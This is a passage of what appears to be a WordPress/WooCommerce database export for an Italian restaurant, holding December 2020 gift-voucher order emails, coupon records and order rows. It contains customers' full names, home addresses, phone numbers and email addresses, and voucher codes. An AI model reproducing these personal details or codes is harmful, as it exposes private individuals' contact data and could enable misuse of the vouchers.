<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small;margin: 1em 0 0;padding: 0\">\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To:</strong> <p style=\"margin: 0\">Laura Lucchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">From:</strong> <p style=\"margin: 0\">Tom e Edo</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">Message:</strong> <p style=\"margin: 0\">Buon Natale 2020</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n				<p style=\"margin: 0 0 16px\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n	<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small;margin: 1em 0 0;padding: 0\">\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To:</strong> <p style=\"margin: 0\">Laura e Matteo</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">From:</strong> <p style=\"margin: 0\">Tom e Edo</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">Message:</strong> <p style=\"margin: 0\">Buon Natale parents!!!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n				<p style=\"margin: 0 0 16px\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">200,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Total:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">200,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				Matteo Sandri<br>Via Saragozza 157 Bologna<br>40135<br>Bologna<br>BOLOGNA									<br><a href=\"tel:3408565027\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">3408565027</a>													<br>matteo.sandri@bahlsen.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Thanks for using www.ristorantesolymar.it!</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar order has been received!','','private','closed','closed','','your-sol-y-mar-order-has-been-received','','','2020-12-24 12:27:04','2020-12-24 11:27:04','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-order-has-been-received/',0,'postman_sent_mail','',0),(3682,0,'2020-12-24 12:27:04','2020-12-24 11:27:04','GIFTCARD ORDER #3679','solymarcouponXVWYM','GIFTCARD ORDER #3679','publish','closed','closed','','solymarcouponxvwym','','','2020-12-24 12:27:04','2020-12-24 11:27:04','',0,'https://www.ristorantesolymar.it/2020/12/24/solymarcouponxvwym/',0,'shop_coupon','',0),(3683,0,'2020-12-24 12:27:09','2020-12-24 11:27:09','\n\n\n\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto;background-color: #ff9898;border-spacing: 10px\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: 0 auto;width: 100%;padding: 10px 0px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0;text-align: left\"><a style=\"font-weight: normal;text-decoration: none;color: #ffffff;margin-left: 10px\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></a></td>\r\n<td style=\"padding: 10px 0;text-align: center\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center;padding: 2px 0px\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: auto\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;width: 50%\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px;text-align: center;width: 50%\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/12/regala-un-coupon.png\" width=\"100%\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555;padding: 10px;text-align: left\">\r\n<p style=\"min-height: 180px\">Buon Natale 2020</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">Da :</span><span style=\"width: 75%;float: left\">Tom e Edo</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">A :</span><span style=\"width: 75%;float: left\">Laura Lucchi</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\r\n<h3 style=\"color: #557da1;font-weight: bold;line-height: 130%;margin: 16px 0 8px;text-align: left;font-size: 30px;font-family: Arial, Helvetica, sans-serif\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center;background-color: #ffd5d5;padding: 10px\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;border-spacing: 20px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px;font-family: sans-serif;line-height: 20px;color: #ff9898;text-align: center;border: 3px\">\r\n<h2 style=\"color: #557da1;font-weight: bold;line-height: 130%;padding: 0px;margin: 10px 0px;font-family: Arial, Helvetica, sans-serif;font-size: 15px;text-align: center\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px;font-weight: bold;margin: 0px;text-align: center\"><img class=\"mwb_wgm_coupon_img\" id=\"1608809224www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1608809224solymarcouponXVWYM.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></p>\r\n<span style=\"font-size: 15px;text-align: center;padding: 10px 0px\">(Scadenza. 22/06/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;padding: 15px;color: #ffffff;background-color: #ff9898;font-size: 18px;font-family: Arial, Helvetica, sans-serif\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n\n\n','Sol Y Mar','','private','closed','closed','','sol-y-mar','','','2020-12-24 12:27:09','2020-12-24 11:27:09','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar/',0,'postman_sent_mail','',0),(3684,0,'2020-12-24 12:27:09','2020-12-24 11:27:09','GIFTCARD ORDER #3679','solymarcoupon74KG4','GIFTCARD ORDER #3679','publish','closed','closed','','solymarcoupon74kg4','','','2020-12-24 12:27:09','2020-12-24 11:27:09','',0,'https://www.ristorantesolymar.it/2020/12/24/solymarcoupon74kg4/',0,'shop_coupon','',0),(3685,0,'2020-12-24 12:27:12','2020-12-24 11:27:12','\n\n\n\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto;background-color: #ff9898;border-spacing: 10px\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: 0 auto;width: 100%;padding: 10px 0px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0;text-align: left\"><a style=\"font-weight: normal;text-decoration: none;color: #ffffff;margin-left: 10px\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></a></td>\r\n<td style=\"padding: 10px 0;text-align: center\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center;padding: 2px 0px\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: auto\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;width: 50%\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px;text-align: center;width: 50%\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/12/regala-un-coupon.png\" width=\"100%\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555;padding: 10px;text-align: left\">\r\n<p style=\"min-height: 180px\">Buon Natale parents!!!</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">Da :</span><span style=\"width: 75%;float: left\">Tom e Edo</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">A :</span><span style=\"width: 75%;float: left\">Laura e Matteo</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\r\n<h3 style=\"color: #557da1;font-weight: bold;line-height: 130%;margin: 16px 0 8px;text-align: left;font-size: 30px;font-family: Arial, Helvetica, sans-serif\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center;background-color: #ffd5d5;padding: 10px\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;border-spacing: 20px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px;font-family: sans-serif;line-height: 20px;color: #ff9898;text-align: center;border: 3px\">\r\n<h2 style=\"color: #557da1;font-weight: bold;line-height: 130%;padding: 0px;margin: 10px 0px;font-family: Arial, Helvetica, sans-serif;font-size: 15px;text-align: center\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px;font-weight: bold;margin: 0px;text-align: center\"><img class=\"mwb_wgm_coupon_img\" id=\"1608809229www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1608809229solymarcoupon74KG4.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></p>\r\n<span style=\"font-size: 15px;text-align: center;padding: 10px 0px\">(Scadenza. 22/06/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;padding: 15px;color: #ffffff;background-color: #ff9898;font-size: 18px;font-family: Arial, Helvetica, sans-serif\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n\n\n','Sol Y Mar','','private','closed','closed','','sol-y-mar-2','','','2020-12-24 12:27:12','2020-12-24 11:27:12','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-2/',0,'postman_sent_mail','',0),(3686,1,'2020-12-24 15:28:59','2020-12-24 14:28:59','','Order &ndash; December 24, 2020 @ 03:28 PM','','wc-cancelled','open','closed','wc_order_33uMUgOXrhPv3','order-dec-24-2020-0228-pm','','','2020-12-24 16:05:37','2020-12-24 15:05:37','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=3686',0,'shop_order','',1),(3687,1,'2020-12-24 15:29:43','2020-12-24 14:29:43','','Order &ndash; December 24, 2020 @ 03:29 PM','','wc-processing','open','closed','wc_order_53x9uuPs57fbY','order-dec-24-2020-0229-pm','','','2020-12-24 15:30:21','2020-12-24 14:30:21','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=3687',0,'shop_order','',2),(3688,0,'2020-12-24 15:30:24','2020-12-24 14:30:24','\n\n	\n		\n		<title>Sol Y Mar</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">You’ve received the following order from Elena Valentini:</p>\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=3687&amp;action=edit\" style=\"font-weight: normal;text-decoration: underline;color: #557da1\">[Order #3687]</a> (24 December 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small;margin: 1em 0 0;padding: 0\">\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To:</strong> <p style=\"margin: 0\"><a href=\"mailto:c.lorenzetti@inwind.it\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">c.lorenzetti@inwind.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">From:</strong> <p style=\"margin: 0\">Elena e Piero</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">Message:</strong> <p style=\"margin: 0\">Tantissimi Auguri di Buone Feste con una piacevole cena per un momemto di relax...</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Total:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				Elena Valentini<br>Via Napoli 19<br>47838<br>Riccione<br>RIMINI									<br><a href=\"tel:3382950071\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">3382950071</a>													<br>c.lorenzetti@inwind.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Congratulations on the sale.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','[Sol Y Mar] Prenotazione da nuovo cliente (3687) - 24 December 2020','','private','closed','closed','','sol-y-mar-prenotazione-da-nuovo-cliente-3687-24-december-2020','','','2020-12-24 